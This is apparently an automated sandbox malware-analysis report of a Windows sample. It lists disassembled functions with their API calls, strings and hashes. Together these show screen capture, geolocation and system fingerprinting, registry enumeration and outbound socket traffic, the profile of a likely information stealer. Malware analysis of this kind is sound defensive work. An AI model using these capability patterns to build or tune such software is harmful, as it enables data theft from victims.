API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 5706546f313706de72a237bf98d2ae5729b4666c4094d2ca0903643dc08702f3
Instruction ID: 49a48b9ff7d9f85728111fd01ff3052bb1d892ac7608ed4be6f17415e4855399
Opcode Fuzzy Hash: 5706546f313706de72a237bf98d2ae5729b4666c4094d2ca0903643dc08702f3
Instruction Fuzzy Hash: 1F01613225878082E760CF25F89539AB3A4F7D8788F449211BA8E4665BDBBCC5D4CF40

Function 0000020933558B30 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 194
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000209335588B0: InitializeCriticalSectionEx.KERNEL32 ref: 0000020933558901
Part of subcall function 00000209335588B0: GetLastError.KERNEL32 ref: 000002093355890B

EnterCriticalSection.KERNEL32 ref: 0000020933558B71
GdiplusStartup.GDIPLUS ref: 0000020933558B98
LeaveCriticalSection.KERNEL32 ref: 0000020933558BA6
LeaveCriticalSection.KERNEL32 ref: 0000020933558BD4
GdipGetImageEncodersSize.GDIPLUS ref: 0000020933558BE2
GdipGetImageEncoders.GDIPLUS ref: 0000020933558C76
GdipCreateBitmapFromScan0.GDIPLUS ref: 0000020933558D40
GdipSaveImageToStream.GDIPLUS ref: 0000020933558D5E
GdipDisposeImage.GDIPLUS ref: 0000020933558DC3
GdipDisposeImage.GDIPLUS ref: 0000020933558DD7

Strings

&, xrefs: 0000020933558D3A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Gdip$Image$CriticalSection$DisposeEncodersLeave$BitmapCreateEnterErrorFromGdiplusInitializeLastSaveScan0SizeStartupStream
String ID: &
API String ID: 1703174404-3042966939
Opcode ID: e0228fc8eea7d5b1ef60bb9784c8d30ef67e4de2cf218bbc2f582390e882f76a
Instruction ID: 1046ac5a166d5296201e8f107f085fca50794b91c7855556b1f5889d3413a227
Opcode Fuzzy Hash: e0228fc8eea7d5b1ef60bb9784c8d30ef67e4de2cf218bbc2f582390e882f76a
Instruction Fuzzy Hash: 35917C32240B449AEB208F21D88879837E4F794799F45C655FA4F4BB97DF34D585CB80

Function 0000020933559BE0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 250
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002093355F890: GetUserGeoID.KERNEL32 ref: 000002093355F8B7
Part of subcall function 000002093355F890: GetGeoInfoA.KERNEL32 ref: 000002093355F8D1
Part of subcall function 000002093355F890: GetGeoInfoA.KERNEL32 ref: 000002093355F921

WSAStartup.WS2_32 ref: 0000020933559D59
socket.WS2_32 ref: 0000020933559D7A
htons.WS2_32 ref: 0000020933559DA0
inet_pton.WS2_32 ref: 0000020933559DE3
connect.WS2_32 ref: 0000020933559DFD
closesocket.WS2_32 ref: 0000020933559E1C
WSACleanup.WS2_32 ref: 0000020933559E22

Strings

system, xrefs: 0000020933559CC5
geo, xrefs: 0000020933559D06

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Info$CleanupStartupUserclosesocketconnecthtonsinet_ptonsocket
String ID: geo$system
API String ID: 213021568-2364779556
Opcode ID: 388fd45e3ccd61a69e39d2ec3ae757f12a76e5d83cfe564e1eab36ba7f911268
Instruction ID: 8b58fa354def30f6cc99dbbf09de033768e7e8f55bdd9a6be08f3d7bfb4685a5
Opcode Fuzzy Hash: 388fd45e3ccd61a69e39d2ec3ae757f12a76e5d83cfe564e1eab36ba7f911268
Instruction Fuzzy Hash: 9AC1B072B85B4099FB00DF65D48A39C33A2A784798F419252EA1F5BAABDF38C585C740

Function 0000020933563B30 Relevance: 13.6, APIs: 9, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0000020933563B61
GetProcessId.KERNEL32 ref: 0000020933563B6A
RmStartSession.RSTRTMGR ref: 0000020933563B8A
RmRegisterResources.RSTRTMGR ref: 0000020933563BB5
RmGetList.RSTRTMGR ref: 0000020933563BEE
RmGetList.RSTRTMGR ref: 0000020933563C50
RmEndSession.RSTRTMGR ref: 0000020933563C8B
RmEndSession.RSTRTMGR ref: 0000020933563CC2
RmEndSession.RSTRTMGR ref: 0000020933563CD7

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Session$ListProcess$CurrentRegisterResourcesStart
String ID:
API String ID: 3299295986-0
Opcode ID: fd498ee3de36280c394abacf9467fc5b9ce5ac8d70b1b0db778499f5d870b0f3
Instruction ID: 425025c689cc45ebe2c233973dee33b8d1b1207fc68fca61a4ecaf0984c9730d
Opcode Fuzzy Hash: fd498ee3de36280c394abacf9467fc5b9ce5ac8d70b1b0db778499f5d870b0f3
Instruction Fuzzy Hash: 8D513C32744B408AF710CFA5E49869D73B1B788788F50916AFE0F67B9ADE34C846CB50

Function 000002093357D5F0 Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093357DA1D

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 47550b20993fbd762e226fa4ca9e05ae32b1ced83bd225dda60327e294bd4ee8
Instruction ID: a43c2e7f5c827905f0d9bbb68c315fa23216fef1fcb21a1e1b26250115e28f95
Opcode Fuzzy Hash: 47550b20993fbd762e226fa4ca9e05ae32b1ced83bd225dda60327e294bd4ee8
Instruction Fuzzy Hash: 7FC1E23225878592E7619B1594C83AD7BE0F7C0B80F59C195FA8F073A3DB79C8C98B40

Function 0000020933558990 Relevance: 9.0, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00000209335589D3
EnterCriticalSection.KERNEL32 ref: 00000209335589E5
EnterCriticalSection.KERNEL32 ref: 00000209335589F5
GdiplusShutdown.GDIPLUS ref: 0000020933558A03
LeaveCriticalSection.KERNEL32 ref: 0000020933558A10
LeaveCriticalSection.KERNEL32 ref: 0000020933558A1A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: 83031f1c3d95a3b59bc2a22e43b72ccd41805d9851eefa9cc92077698de98015
Instruction ID: a9b5ab262098d7fe69db9f1b8d2c1a84c578ba121034a52545f990bc4b70cc5f
Opcode Fuzzy Hash: 83031f1c3d95a3b59bc2a22e43b72ccd41805d9851eefa9cc92077698de98015
Instruction Fuzzy Hash: 44114C32241B44C1FB10DF25E89811973B4FB84FA5B688255EAAF427A6DF34C9D7CB90

Function 00007FF6CFA37CB0 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA37F9D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA37FA3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA37FAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA37FB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA37FBB

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 68560b9ec9290b65af6a78de1ac2c7821c6a1d2327af68e69ac7e4eae41ab174
Instruction ID: aef4acb961b4ab380f7a9442a11c923ee0e0e5cd6661da909d4215b51afb98b6
Opcode Fuzzy Hash: 68560b9ec9290b65af6a78de1ac2c7821c6a1d2327af68e69ac7e4eae41ab174
Instruction Fuzzy Hash: BD817572A18B8286EB10CF65E44026EB3A5FB887A4F105735EADD43B99DF3CD185C710

Function 00007FF6CFA37A80 Relevance: 7.6, APIs: 5, Instructions: 147COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6CFA37ACF
OpenProcessToken.ADVAPI32 ref: 00007FF6CFA37AE2
GetTokenInformation.KERNELBASE ref: 00007FF6CFA37B1E
RtlEnterCriticalSection.NTDLL ref: 00007FF6CFA37B5F
RtlLeaveCriticalSection.NTDLL ref: 00007FF6CFA37B6D

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: CriticalProcessSectionToken$CurrentEnterInformationLeaveOpen
String ID:
API String ID: 2440646923-0
Opcode ID: a6224817af5826b4e66e685dd3dccc438d8954053d36f8f870129e687be14717
Instruction ID: bb655be762d81714884c67ced3efc7597f7a709125d0046b0a2f5159f2b11eee
Opcode Fuzzy Hash: a6224817af5826b4e66e685dd3dccc438d8954053d36f8f870129e687be14717
Instruction Fuzzy Hash: 0C516421A0CA42D6FB609F91B55037AE3A1AF85BD2F544030EEDE87B95DF3DD8498720

Function 000002093355E9F0 Relevance: 6.4, APIs: 4, Instructions: 417networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 000002093355EBCC
recv.WS2_32 ref: 000002093355F0AC
closesocket.WS2_32 ref: 000002093355F0BE
WSACleanup.WS2_32 ref: 000002093355F0C4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: recv$Cleanupclosesocket
String ID:
API String ID: 146070474-0
Opcode ID: 6ac7e636abf0746f446484eccbd1ce1197610ff2644bc42bc9660581a8d3f8d4
Instruction ID: 9aa4b14d9633585c0e1c2b093bf690bd4ed36ec1811a99deef34a27837ccb221
Opcode Fuzzy Hash: 6ac7e636abf0746f446484eccbd1ce1197610ff2644bc42bc9660581a8d3f8d4
Instruction Fuzzy Hash: A9128372698BC081EA20DB15E4993DEB761F7C9794F508351EA9E46AEBDF78C4C4CB00

Function 00007FF6CFA319A0 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CFA316C0: GetModuleHandleW.KERNEL32 ref: 00007FF6CFA316FD
Part of subcall function 00007FF6CFA316C0: RtlImageNtHeader.NTDLL ref: 00007FF6CFA3171D
Part of subcall function 00007FF6CFA316C0: RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA3177A
Part of subcall function 00007FF6CFA316C0: RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA31914

RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA31A0B
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6CFA31A73
RtlImageDirectoryEntryToData.NTDLL ref: 00007FF6CFA31B08

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: NumbersVersion$Image$DataDirectoryEntryHandleHeaderModule
String ID:
API String ID: 1637451276-0
Opcode ID: c7c4423c1df835fe1051eadc678f80f7c1d6eee4b7a917dd86c14d9ff8850ea5
Instruction ID: 7cd9f01a020b7e72d86349c31bc2282b2db6e95f48d784ffa4f450dae8e79c33
Opcode Fuzzy Hash: c7c4423c1df835fe1051eadc678f80f7c1d6eee4b7a917dd86c14d9ff8850ea5
Instruction Fuzzy Hash: AA616E72F24A02DAEB50CFA4D4402ADB7F1FB4874AF451136CA4D97658EF38E559C720

Function 0000020933560420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegGetValueA.ADVAPI32 ref: 0000020933560489

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 000002093356047B
ProductName, xrefs: 0000020933560474

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Value
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3702945584-1787575317
Opcode ID: 4b31b020cac4b58e91cc22bf7df28ffde147e0876d00deb1f16a5955c36cd2ac
Instruction ID: 2958d7e99a28f70ef2e62d29633aa01d7bb49d6aba96e4ea8fdbe32272cf1ea6
Opcode Fuzzy Hash: 4b31b020cac4b58e91cc22bf7df28ffde147e0876d00deb1f16a5955c36cd2ac
Instruction Fuzzy Hash: E2118E32248B8082E720CF21F48539AB3A4F7D9798F409216EA8D07B5ACFBCC194CF40

Function 000002093356B090 Relevance: 4.9, APIs: 3, Instructions: 440COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093356B26B
Concurrency::cancel_current_task.LIBCPMT ref: 000002093356B474
Concurrency::cancel_current_task.LIBCPMT ref: 000002093356B5F0

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: aeb04cbe2e64a9bd063bfee14777abaca28d8890e49898cadc59537802b73123
Instruction ID: d6abd8ef79174e9eee721e3ff0eacb90f4f5d0d696638750da0664e8bd90eeb0
Opcode Fuzzy Hash: aeb04cbe2e64a9bd063bfee14777abaca28d8890e49898cadc59537802b73123
Instruction Fuzzy Hash: EBF1B372351B8482DA24CB26E4987A973A4F7887D4F14D725AEAE47797EF38C1D0C700

Function 00007FF6CFA32E10 Relevance: 4.8, APIs: 3, Instructions: 298libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CFA34F00: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CFA33C4C,?,?,?,00007FF6CFA31097), ref: 00007FF6CFA34F50

LoadLibraryA.KERNEL32 ref: 00007FF6CFA330F8
GetProcAddress.KERNEL32 ref: 00007FF6CFA3310E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA3318C

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: AddressLibraryLoadProcQueryVirtual_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3513549592-0
Opcode ID: e3ab0b1cb5af30e30cab7697ef1babff4d2411869d2c5dc3a56a725404a04dc9
Instruction ID: cf77ae30fdc129b625fdf6ecb883dd62563d70a8b5bc5dd35cf6a3a21c43b842
Opcode Fuzzy Hash: e3ab0b1cb5af30e30cab7697ef1babff4d2411869d2c5dc3a56a725404a04dc9
Instruction Fuzzy Hash: 32C1AF62F08B52C5FB108FA1D4003ACA7A1BB05B99F644136DE9D97789DF79E489C360

Function 000002093355ED77 Relevance: 4.7, APIs: 3, Instructions: 182networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 000002093355F0AC
closesocket.WS2_32 ref: 000002093355F0BE
WSACleanup.WS2_32 ref: 000002093355F0C4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Cleanupclosesocketrecv
String ID:
API String ID: 3447645871-0
Opcode ID: a4e4beb0bee0dd8c1654369b58c6b73caeea3375ddadbf5a7364a490a418a695
Instruction ID: 7efc3935509bfe6077130e3011b85f1fe33b6a8b9331d3d9928d91a5fd1209e7
Opcode Fuzzy Hash: a4e4beb0bee0dd8c1654369b58c6b73caeea3375ddadbf5a7364a490a418a695
Instruction Fuzzy Hash: 34918873A54BC081EA209B15E49939E6751F7C97A0F508341EAAE47BEBDF78D4C0CB00

Function 0000020933561111 Relevance: 4.7, APIs: 3, Instructions: 163registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000020933561129
RegEnumKeyExA.ADVAPI32 ref: 000002093356116E
RegCloseKey.ADVAPI32 ref: 0000020933561364

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: dc6eaaf38dedbeca932119753ef40dc9f1e5ce7a17efdfe58678b8151bdc1d20
Instruction ID: 9f8dd59f9ed9f6664c8e5d1371e0dfca1019998e969ce5924e0eb6e17eec3490
Opcode Fuzzy Hash: dc6eaaf38dedbeca932119753ef40dc9f1e5ce7a17efdfe58678b8151bdc1d20
Instruction Fuzzy Hash: 1B718D72A44B8485EB10CB69E4883AD6761F7C57A8F509305FAAE57ADBDB78C1C1CB00

Function 00000209335610A0 Relevance: 4.6, APIs: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000020933561129
RegEnumKeyExA.ADVAPI32 ref: 000002093356116E

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: a8920e58832bf877e089fa0af907033f7a3b2d639e35d700202a240f283f6ca3
Instruction ID: b8fee18a7b350bd188c1e4b791e5f9609488a7f8f6f134df74081ec1f79bc356
Opcode Fuzzy Hash: a8920e58832bf877e089fa0af907033f7a3b2d639e35d700202a240f283f6ca3
Instruction Fuzzy Hash: 6A319F32744B8486F720CF61E8887AE73B4F784798F209215EE9E17A56DB78C1D2CB00

Function 0000020933560DDB Relevance: 4.6, APIs: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000020933560DF7
RegQueryValueExA.ADVAPI32 ref: 0000020933560E36
RegCloseKey.ADVAPI32 ref: 0000020933560ED4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 2412220f54889fab1f201432317abad340f1fd99411dd5ca80479f7620d27d2e
Instruction ID: ce3948ebbef15d6772f326a10ada3e6b02f11d6616d8ec6e86aefd42d37bfc24
Opcode Fuzzy Hash: 2412220f54889fab1f201432317abad340f1fd99411dd5ca80479f7620d27d2e
Instruction Fuzzy Hash: 2621A263698B8481EA509B25E08436EA760E7D97D4F50E212FA8E43A9BDF3CC4C4CF40

Function 000002093355F890 Relevance: 4.6, APIs: 3, Instructions: 50COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNEL32 ref: 000002093355F8B7
GetGeoInfoA.KERNEL32 ref: 000002093355F8D1
GetGeoInfoA.KERNEL32 ref: 000002093355F921

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Info$User
String ID:
API String ID: 2017065092-0
Opcode ID: d34c2ece54cb3812040e4eef0477fed434900964bc97860851aa3e607d5351a2
Instruction ID: be2d86be66b750613aafd822b5c605cea161091655864d84a4dd92f979313954
Opcode Fuzzy Hash: d34c2ece54cb3812040e4eef0477fed434900964bc97860851aa3e607d5351a2
Instruction Fuzzy Hash: D011BF32A18B8482E7109F61F45471EB3A1F7C4F88F049224EF8A03B5ADF7CD5908B84

Function 0000020933559760 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000002093355979B
OpenProcessToken.ADVAPI32 ref: 00000209335597AE
GetTokenInformation.ADVAPI32 ref: 00000209335597EA

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ProcessToken$CurrentInformationOpen
String ID:
API String ID: 2743777493-0
Opcode ID: 5cf106d3b2ffd2a7e9a61a7f883b18dc6c947c023f1ec599732081f4b0d6fdce
Instruction ID: bf3add3766e1d9c324c071727490c93ff1bc4e826536c0e952f2d547dbf1d1f0
Opcode Fuzzy Hash: 5cf106d3b2ffd2a7e9a61a7f883b18dc6c947c023f1ec599732081f4b0d6fdce
Instruction Fuzzy Hash: 88111C32258B8086E7508F16F88434AB2A0F7C9B80F549166FB9E57B6ACF3CC445CF40

Function 00007FF6CFA34050 Relevance: 3.9, APIs: 3, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF6CFA341B7

Part of subcall function 00007FF6CFA34F00: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CFA33C4C,?,?,?,00007FF6CFA31097), ref: 00007FF6CFA34F50

VirtualFree.KERNEL32(?), ref: 00007FF6CFA342B5
VirtualAlloc.KERNEL32 ref: 00007FF6CFA342F6

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Virtual$Alloc$FreeQuery
String ID:
API String ID: 609462816-0
Opcode ID: ea88e6755f1c952dde9103f57d4804c3fc97b2dab698ddd173a76000a050952f
Instruction ID: b9bcedbb1df49111ba62ffc4cf65d4333b2c76b11ddc154dd21bb3a8f08ef0cd
Opcode Fuzzy Hash: ea88e6755f1c952dde9103f57d4804c3fc97b2dab698ddd173a76000a050952f
Instruction Fuzzy Hash: CC718321A0CB42CAFA645ED1A55027AE791AF95BC6F544034DECD97B85DF3DE80E8320

Function 000002093351F350 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093351F53C

Strings

, xrefs: 000002093351F3D3

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-3916222277
Opcode ID: 5d8344d1d23d15b813540ba0f513445bd4a4c2f51194747e07e10b20fcb55d41
Instruction ID: 5cd69c8904487e84ff87841b0ff9418317202efdb82d6994309699b0b6ecc67c
Opcode Fuzzy Hash: 5d8344d1d23d15b813540ba0f513445bd4a4c2f51194747e07e10b20fcb55d41
Instruction Fuzzy Hash: B6517672644B4496EF158F2AD09835C33A0F388B94F948762EB4E87BA7DF78D4A1C700

Function 0000020933560C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 0000020933560C6C

Strings

Unknown, xrefs: 0000020933560D26

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 327d7d51cf89ce8cae5e34d504ec04f85fc3bceab43135c4ad84e114b6f625fa
Instruction ID: 9d9aeb9240c82676e57d4fd6e5e4500ed90aa11c0134938fefe82a409eeae826
Opcode Fuzzy Hash: 327d7d51cf89ce8cae5e34d504ec04f85fc3bceab43135c4ad84e114b6f625fa
Instruction Fuzzy Hash: 6431CF23628BC086E7108F21E4843AAB760F7D9784F54A215FBCE16A4BDB7CC6D5CB00

Function 00000209335251E0 Relevance: 3.2, APIs: 2, Instructions: 192COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000020933525320
Concurrency::cancel_current_task.LIBCPMT ref: 000002093352541F

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

